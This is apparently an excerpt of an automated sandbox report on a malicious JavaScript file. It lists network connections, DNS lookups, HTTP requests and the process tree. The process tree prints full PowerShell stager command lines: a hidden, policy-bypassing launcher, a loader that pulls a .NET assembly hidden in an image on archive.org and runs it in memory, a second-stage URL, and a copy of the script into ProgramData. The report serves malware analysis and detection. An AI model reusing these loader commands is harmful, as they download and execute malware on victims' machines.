                            Aug 12, 2024 11:37:07.050246000 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:07.050362110 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:07.050362110 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:07.050369024 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:07.050446033 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:07.077723026 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:07.077805996 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:07.077872038 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:07.077881098 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:07.077986956 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:07.078067064 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:07.078161001 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:07.080764055 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
                            Aug 12, 2024 11:37:07.689757109 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:07.689801931 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:07.689882040 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:07.690361023 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:07.690376997 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:08.563148975 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:08.563272953 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:08.566042900 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:08.566059113 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:08.566302061 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:08.567393064 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:08.612498999 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:08.972131968 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:08.972161055 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:08.972264051 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:08.972285032 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.027081966 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.119940996 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.119956970 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.120054960 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.120270014 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.120276928 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.120332956 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.122076035 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.122097969 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.122147083 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.122174978 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.166579008 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.166683912 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.275511980 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.275620937 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.276519060 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.276607037 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.277556896 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.277614117 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.278876066 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.278933048 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.279889107 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.279941082 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.321898937 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.322021008 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.322860003 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.322926998 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.431540012 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.431752920 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.432106972 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.432179928 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.432560921 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.432629108 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.433170080 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.433233023 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.433737993 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.433798075 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.434472084 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.434530020 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.434942007 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.434998035 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.435672998 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.435729980 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.436988115 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.437050104 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.437423944 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.437484980 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.437953949 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.438008070 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.478674889 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.478751898 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.478887081 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.478945017 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.518907070 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.519006968 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.519251108 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.519311905 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.603120089 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.603228092 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.607496023 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.607563019 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.607995987 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.608055115 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.609148979 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.609210014 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.610044003 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.610110044 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.611408949 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.611462116 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.612452030 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.612502098 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.612859964 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.612912893 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.613262892 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.613322973 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.613977909 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.614028931 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Aug 12, 2024 11:37:09.614073038 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.622031927 CEST | 49705 | 443 | 192.168.2.5 | 195.54.178.4
                            Aug 12, 2024 11:37:09.622041941 CEST | 443 | 49705 | 195.54.178.4 | 192.168.2.5
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Aug 12, 2024 11:37:04.529937029 CEST | 61010 | 53 | 192.168.2.5 | 1.1.1.1
                            Aug 12, 2024 11:37:04.682049036 CEST | 53 | 61010 | 1.1.1.1 | 192.168.2.5
                            Aug 12, 2024 11:37:07.420547009 CEST | 64740 | 53 | 192.168.2.5 | 1.1.1.1
                            Aug 12, 2024 11:37:07.689033031 CEST | 53 | 64740 | 1.1.1.1 | 192.168.2.5
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                            Aug 12, 2024 11:37:04.529937029 CEST | 192.168.2.5 | 1.1.1.1 | 0xfbfc | Standard query (0) | ia601606.us.archive.org | A (IP address) | IN (0x0001) | false
                            Aug 12, 2024 11:37:07.420547009 CEST | 192.168.2.5 | 1.1.1.1 | 0x6d47 | Standard query (0) | maso.ge | A (IP address) | IN (0x0001) | false
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Aug 12, 2024 11:37:04.682049036 CEST | 1.1.1.1 | 192.168.2.5 | 0xfbfc | No error (0) | ia601606.us.archive.org | | 207.241.227.86 | A (IP address) | IN (0x0001) | false
                            Aug 12, 2024 11:37:07.689033031 CEST | 1.1.1.1 | 192.168.2.5 | 0x6d47 | No error (0) | maso.ge | | 195.54.178.4 | A (IP address) | IN (0x0001) | false
                            • ia601606.us.archive.org
                            • maso.ge
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.5 | 49704 | 207.241.227.86 | 443 | 6800 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-08-12 09:37:05 UTC | 112 | OUT | GET /10/items/deathnote_202407/deathnote.jpg HTTP/1.1
                            Host: ia601606.us.archive.org
                            Connection: Keep-Alive
                            2024-08-12 09:37:05 UTC | 582 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.25.1
                            Date: Mon, 12 Aug 2024 09:37:05 GMT
                            Content-Type: image/jpeg
                            Content-Length: 1931225
                            Last-Modified: Fri, 26 Jul 2024 22:09:28 GMT
                            Connection: close
                            ETag: "66a41e98-1d77d9"
                            Strict-Transport-Security: max-age=15724800
                            Expires: Mon, 12 Aug 2024 15:37:05 GMT
                            Cache-Control: max-age=21600
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                            Access-Control-Allow-Credentials: true
                            Accept-Ranges: bytes


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            1 | 192.168.2.5 | 49705 | 195.54.178.4 | 443 | 6800 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-08-12 09:37:08 UTC | 73 | OUT | GET /wp-admin/sky.txt HTTP/1.1
                            Host: maso.ge
                            Connection: Keep-Alive
                            2024-08-12 09:37:08 UTC | 209 | IN | HTTP/1.1 200 OK
                            Date: Mon, 12 Aug 2024 09:37:07 GMT
                            Server: Apache
                            Last-Modified: Sat, 10 Aug 2024 19:44:27 GMT
                            Accept-Ranges: bytes
                            Content-Length: 318124
                            Connection: close
                            Content-Type: text/plain



                            Target ID:0
                            Start time:05:37:00
                            Start date:12/08/2024
                            Path:C:\Windows\System32\wscript.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\15514541_Doc_Sub(C-A0893)10-08-2024.js"
                            Imagebase:0x7ff7543d0000
                            File size:170'496 bytes
                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:2
                            Start time:05:37:01
                            Start date:12/08/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated base64 payload omitted]'
?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?Bb? ? ? ? ?F0? ? ? ? ?XQ? ? ? ? ?g? ? ? ? ?Cg? ? ? ? ?JwB0? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Hk? ? ? ? ?awBz? ? ? ? ?C8? ? ? ? ?bgBp? ? ? ? ?G0? ? ? ? ?Z? ? ? ? ?Bh? ? ? ? ?C0? ? ? ? ?c? ? ? ? ?B3? ? ? ? ?C8? ? ? ? ?ZQBn? ? ? ? ?C4? ? ? ? ?bwBz? ? ? ? ?GE? ? ? ? ?bQ? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?OgBz? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?DE? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?EM? ? ? ? ?OgBc? ? ? ? ?F? ? ? ? ?? ? ? ? ?cgBv? ? ? ? ?Gc? ? ? ? ?cgBh? ? ? ? ?G0? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQBc? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBu? ? ? ? ?GU? ? ? ? ?dQBy? ? ? ? ?G8? ? ? ? ?bQBv? ? ? ? ?Cc? ? ? ? ?L? ? ? ? ?? ? ? ? ?n? ? ? ? ?EE? ? ? ? ?Z? ? ? ? ?Bk? ? ? ? ?Ek? ? ? ? ?bgBQ? ? ? ? ?HI? ? ? ? ?bwBj? ? ? ? ?GU? ? ? ? ?cwBz? ? ? ? ?DM? ? ? ? ?Mg? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?p? ? ? ? ?? ? ? ? ?==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:3
                            Start time:05:37:01
                            Start date:12/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:05:37:03
                            Start date:12/08/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))"
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:5
                            Start time:05:37:06
                            Start date:12/08/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\neuromo.js"
                            Imagebase:0x7ff754f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:6
                            Start time:05:37:06
                            Start date:12/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Executed Functions

                            Memory Dump Source
                            • Source File: 00000002.00000002.2262153688.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                            • Instruction ID: 8979d17b611d2f02bd41aeeb7e19fc684a639d902bce64cf38cc553155f26dc5
                            • Opcode Fuzzy Hash: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                            • Instruction Fuzzy Hash: 7701677111CB0D4FDB44EF0CE451AA6B7E0FB95364F10056EE58AC36A5D736E882CB46

                            Executed Functions

                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b2376c3523b27b754c0817c031575b434be2e13ae2ee54868bf2e6b3965e36ae
                            • Instruction ID: d1394af1c9603a0af48046401ec93a675388b6762f86fe5f07e0f735c7fc525d
                            • Opcode Fuzzy Hash: b2376c3523b27b754c0817c031575b434be2e13ae2ee54868bf2e6b3965e36ae
                            • Instruction Fuzzy Hash: EB522732E0DA894FE39AAB6C58151B57BE1EF96660F1801BBC14DC71D3DF28AC06C395
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b903d6acf209dc488ce18fa60c24e036e196889d3fb49a6fd2d91121d3f22352
                            • Instruction ID: 0e21ea0ffadd4cb27536b4b65debc5bca958bd26a3a3c4196147de2f7092d235
                            • Opcode Fuzzy Hash: b903d6acf209dc488ce18fa60c24e036e196889d3fb49a6fd2d91121d3f22352
                            • Instruction Fuzzy Hash: 84524532E0DA8A4FE7A6AB2858546B57BE1EF56750F0801FBC10DC71D3DE28AC46C359
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ed2209c34bb77e5389d6db965ca842bbd5f940f3a1cf697871ccfe30de41994a
                            • Instruction ID: 0a3ed123ca21030b99f048c92e5c2ca22a275c9b4bc0f7f88cccb1c86d00a6c6
                            • Opcode Fuzzy Hash: ed2209c34bb77e5389d6db965ca842bbd5f940f3a1cf697871ccfe30de41994a
                            • Instruction Fuzzy Hash: F8C10131E1EA8A5FE795EB2858195B5BBE1FF1A364F0800FBD14CC70D3EB18A8058359
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d851092b8668e11e73beb6c4eb6709252b1204b734fa6e18ef74c7bfdd916924
                            • Instruction ID: b9aedca2d11fdf93d5e776c42379db4fd45057ab67429b41cb2d654f51761429
                            • Opcode Fuzzy Hash: d851092b8668e11e73beb6c4eb6709252b1204b734fa6e18ef74c7bfdd916924
                            • Instruction Fuzzy Hash: D5610832E1EA8B4FF7A9B72854552B566D1EF95690F4800BBCB0DC31D3EF1CA8058349
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5797fefd730455c2f5ef59f19896b3a1ae002d0bf9a287b2e1f2bd0ca2f92442
                            • Instruction ID: 580462ccb75762fe235fcad8a6e8165ab237c891e174c1a6da16f516ef560b7a
                            • Opcode Fuzzy Hash: 5797fefd730455c2f5ef59f19896b3a1ae002d0bf9a287b2e1f2bd0ca2f92442
                            • Instruction Fuzzy Hash: 2C513632D1DB8A4FE7B5AF6848151757BE1EF66350F0901BBC64DC71D3DA28AC068386
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 29f4f24de7ba40cc755d79a820f3ce48c70aaa6d72c6141282a85eb42b705076
                            • Instruction ID: d7c05810df29972569ffdda6d8397dc138b25da71c887e4281aa1743ac9a4253
                            • Opcode Fuzzy Hash: 29f4f24de7ba40cc755d79a820f3ce48c70aaa6d72c6141282a85eb42b705076
                            • Instruction Fuzzy Hash: 66411532E1DA8A4FE7B9EF58485517576E1EF95350F0801BFCA0DC72D2DB28AC068789
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 32cd2f41a3b145341fc2bd438353b4e151879d7efb13f72079bf583cbf2cd22a
                            • Instruction ID: deed896fddd923da082fa5b8768b974064e60d0702983119710195407ebc2a62
                            • Opcode Fuzzy Hash: 32cd2f41a3b145341fc2bd438353b4e151879d7efb13f72079bf583cbf2cd22a
                            • Instruction Fuzzy Hash: E341E332E1DA5A4FE7A5B72C14116B966D2EFD4690F4801BBCA0DC31D6DF18AC018389
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2f20ee330e9a8bcfc4b4dc6d65b7d5853c3fe54ad7503cf5eed640a3f2da3b54
                            • Instruction ID: 5fd23f519c736000cc32b327ae77fdd0a75265221ee39f1f5936151d7acf5589
                            • Opcode Fuzzy Hash: 2f20ee330e9a8bcfc4b4dc6d65b7d5853c3fe54ad7503cf5eed640a3f2da3b54
                            • Instruction Fuzzy Hash: 6B410032E1CA4A4FF7A4EB6C449427866D1EFA4390F8801BBD61CC72D6EF29DC458365
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f5ce0202fa13a94610ec36015bada4c32e2b60e1f124e5c7f0678a4db52d8329
                            • Instruction ID: 172a5c503b7dd8ec4eef0a64307cd180ab075748b92a33acd0d9450d28771133
                            • Opcode Fuzzy Hash: f5ce0202fa13a94610ec36015bada4c32e2b60e1f124e5c7f0678a4db52d8329
                            • Instruction Fuzzy Hash: 30411332E1FA8B4FF3A9B728446527966D2EF90295F5800BBCB0DD31D2EF1CA8044309
                            Memory Dump Source
